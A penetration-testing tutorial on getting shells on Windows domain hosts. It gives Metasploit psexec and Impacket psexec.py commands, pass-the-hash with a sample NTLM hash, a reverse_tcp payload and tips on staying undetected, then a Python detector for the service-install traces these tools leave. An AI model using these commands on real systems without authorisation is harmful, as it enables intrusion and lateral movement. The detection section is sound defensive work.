Gaining Shell Access

Introduction

When attacking a Windows domain, a shell is not strictly necessary to compromise the domain. But if you are stuck, or if you want to gather more information or sensitive files, getting a shell is beneficial.

Metasploit

The problem with Metasploit is that it produces a lot of noise on the network and will most likely get picked up by security devices.

Run Metasploit

msfconsole

Use PsExec Module

use exploit/windows/smb/psexec

Set Module Options

You need to set the following module options to be able to connect to a host.

  • RHOST - IP address of the target host.

  • SMBDomain - Windows domain (contoso.local). Set this if you intend to use a Domain Account.

  • SMBPass - Password for the specified username.

  • SMBUser - Username to authenticate as.

Other configurable options:

  • Payload

  • Target

You can use the show options or options command to display the list of configurable options for the module.

show options
set RHOST 192.168.1.1
set SMBDomain contoso.local
set SMBPass password123
set SMBUser john.doe

You can set the Payload by running the command:

Syntax: set payload [payload]

set payload windows/x64/meterpreter/reverse_tcp

Run Exploit

To run the exploit you just need to enter the run or exploit command.

run

PsExec using NTLM Hash

You can also use the SAM hash for PsExec. This is useful if you are unable to crack the hash of a local account. When setting SMBPass, use the whole hash value of the account as it appears in the SAM dump.

Syntax: set SMBPass [NTLM Hash]

set SMBPass aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f

Unset SMBDomain so that local credentials are used instead of domain credentials. You can also set it explicitly with set SMBDomain.

unset SMBDomain

PsExec.py

psexec.py (from Impacket) is much quieter than Metasploit and is less likely to get picked up. You can use this tool with either a password or a hash.

Using Password

Syntax: psexec.py [domain]/[username]:'[password]'@[target]

psexec.py contoso.local/admin:'Password1'@10.1.1.14

If the password is complex or you get errors because of the characters in it, run psexec.py [domain]/[username]:@[IP] without the password; you will then be prompted to enter it.

psexec.py contoso.local/Administrator:@10.1.1.14

Using Hash

Syntax: psexec.py [username]@[IP] -hashes [NTLM Hash]

psexec.py [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f

Alternative Programs

wmiexec.py: https://github.com/fortra/impacket/blob/master/examples/wmiexec.py

smbexec.py: https://github.com/fortra/impacket/blob/master/examples/smbexec.py
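All of the service-based tools above leave the same trace on the target: a new service whose binary was written to the ADMIN$ share (the Metasploit psexec module and Impacket's psexec.py both upload a randomly named executable there), or, for smbexec.py, a service whose ImagePath is a cmd.exe one-liner instead of a real binary. The Python below is an added example, not code from the original page or from Impacket/Metasploit; it scans constructed, flattened Event ID 7045 ("a service was installed") records for those traces, and the record format, host names and service names are assumptions made for the example. wmiexec.py creates no service, so this check would not see it.

```python
import re

# Constructed sample records in the shape of Windows System-log Event ID 7045
# ("A service was installed in the system"), flattened to one line each.
# They are not real telemetry; hosts, names and paths are made up for this example.
SAMPLE_7045_EVENTS = [
    "EventID=7045 Host=WS01 ServiceName=PSEXESVC ImagePath=%SystemRoot%\\PSEXESVC.exe StartType=demand start AccountName=LocalSystem",
    "EventID=7045 Host=WS01 ServiceName=xNqRkTwm ImagePath=%SystemRoot%\\fYkLmqzr.exe StartType=demand start AccountName=LocalSystem",
    "EventID=7045 Host=WS02 ServiceName=BTOBTO ImagePath=%COMSPEC% /Q /c echo dir ^> \\\\127.0.0.1\\C$\\__output 2^>^&1 > %TEMP%\\execute.bat & %COMSPEC% /Q /c %TEMP%\\execute.bat & del %TEMP%\\execute.bat StartType=demand start AccountName=LocalSystem",
    "EventID=7045 Host=WS03 ServiceName=Sense ImagePath=\"C:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe\" StartType=auto start AccountName=LocalSystem",
    "EventID=7045 Host=WS03 ServiceName=vmtools ImagePath=\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" StartType=auto start AccountName=LocalSystem",
]

EVENT_RE = re.compile(
    r"EventID=(?P<id>\d+) Host=(?P<host>\S+) ServiceName=(?P<svc>\S+) "
    r"ImagePath=(?P<path>.*?) StartType=(?P<start>.+?) AccountName=(?P<acct>\S+)$"
)
# A bare executable sitting directly in the Windows directory: that is where a
# file written to the ADMIN$ share lands, which is how the Metasploit psexec
# module and Impacket's psexec.py deliver their randomly named service binary.
DROPPED_IN_SYSTEMROOT = re.compile(r"^(?:%systemroot%|c:\\windows)\\[a-z0-9]{4,16}\.exe$", re.I)
# smbexec.py-style service: the ImagePath is a cmd.exe one-liner that redirects
# its output to a UNC path on the host's own share instead of pointing at a binary.
SHELL_WITH_UNC_OUTPUT = re.compile(r"(?:%comspec%|cmd\.exe).*\\\\", re.I)
# Sysinternals PsExec and the Impacket smbexec.py default service name.
KNOWN_SERVICE_NAMES = {"PSEXESVC", "BTOBTO"}


def analyze_event(line):
    """Return (host, service, [reasons]) for a suspicious 7045 record, else None."""
    m = EVENT_RE.match(line)
    if not m or m.group("id") != "7045":
        return None
    svc, path = m.group("svc"), m.group("path")
    reasons = []
    if svc.upper() in KNOWN_SERVICE_NAMES:
        reasons.append("known remote-execution service name")
    if DROPPED_IN_SYSTEMROOT.match(path):
        reasons.append("executable dropped directly in %SystemRoot% (ADMIN$)")
    if SHELL_WITH_UNC_OUTPUT.search(path):
        reasons.append("service binary is a cmd.exe one-liner writing output to a UNC path")
    return (m.group("host"), svc, reasons) if reasons else None


def scan(lines):
    """Run every record through analyze_event and collect the hits."""
    return [hit for hit in map(analyze_event, lines) if hit]


if __name__ == "__main__":
    for host, svc, reasons in scan(SAMPLE_7045_EVENTS):
        print(f"{host}: service {svc!r}: {'; '.join(reasons)}")
```

Event ID 7045 is logged on the target regardless of how quiet the tool is on the wire, so the "quieter" psexec.py still shows up here; Security event 4697 carries the same data where service-install auditing is enabled.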
